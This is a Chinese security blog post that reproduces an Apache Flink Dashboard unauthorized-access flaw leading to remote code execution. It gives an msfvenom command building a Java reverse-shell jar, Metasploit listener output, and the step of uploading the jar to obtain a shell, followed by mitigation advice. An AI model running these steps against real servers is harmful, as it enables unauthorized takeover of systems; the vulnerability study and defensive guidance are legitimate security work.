美文网首页
2020-10-24Apache Flink未授权访问-远程代码

2020-10-24Apache Flink未授权访问-远程代码

作者: thelostworldSec | 来源:发表于2020-10-24 18:45 被阅读0次

    ​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。

    Apache Flink未授权访问-远程代码命令执行-复现

    一、漏洞简介

    Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。

    二、影响版本

    Apache Flink <= 1.9.1(最新版本)

    三、漏洞复现

    1、生成反弹jar包

    msfvenom-p java/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4444-f jar > rce.jar

    2、msf设置监听

    msf5> use exploit/multi/handler [*]Using configured payload generic/shell_reverse_tcpmsf5exploit(multi/handler) > set payload java/shell/reverse_tcp payload=> java/shell/reverse_tcpmsf5exploit(multi/handler) > show options ​Moduleoptions (exploit/multi/handler):​NameCurrent Setting  Required  Description-------------------  --------  -----------​​Payloadoptions (java/shell/reverse_tcp):​NameCurrent Setting  Required  Description-------------------  --------  -----------LHOSTyes      The listen address (an interface may be specified)LPORT4444            yes      The listen port​​Exploittarget:​IdName------0Wildcard Target​​msf5exploit(multi/handler) > set LHOST XX.XX.XX.XXLHOST=> XX.XX.XX.XXmsf5exploit(multi/handler) > exploit ​[*]Started reverse TCP handler on XX.XX.XX.XX:4444

    3、上传 Jar包,并且提交

    监听接受反弹的shell,获取权限

    四、安全建议

    1. 请关注Apache Flink官方以便获取更新信息:https://flink.apache.org/

    2.针对ApacheFlinkDashboard设置防火墙策略(禁止Dashboard对外访问,或者确保只对可信端点开放), 仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。关于认证设置可参考链接:

    https://httpd.apache.org/docs/2.4/mod/mod_auth_digest.html。

    五、参考连接

    http://www.llidc.com/news/858.html

    https://nitec.jhun.edu.cn/da/64/c4987a121444/page.htm

    免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

    订阅查看更多复现文章、学习笔记

    thelostworld

    安全路上,与你并肩前行!!!!

    相关文章

      网友评论

          本文标题:2020-10-24Apache Flink未授权访问-远程代码

          本文链接:https://www.haomeiwen.com/subject/pulwmktx.html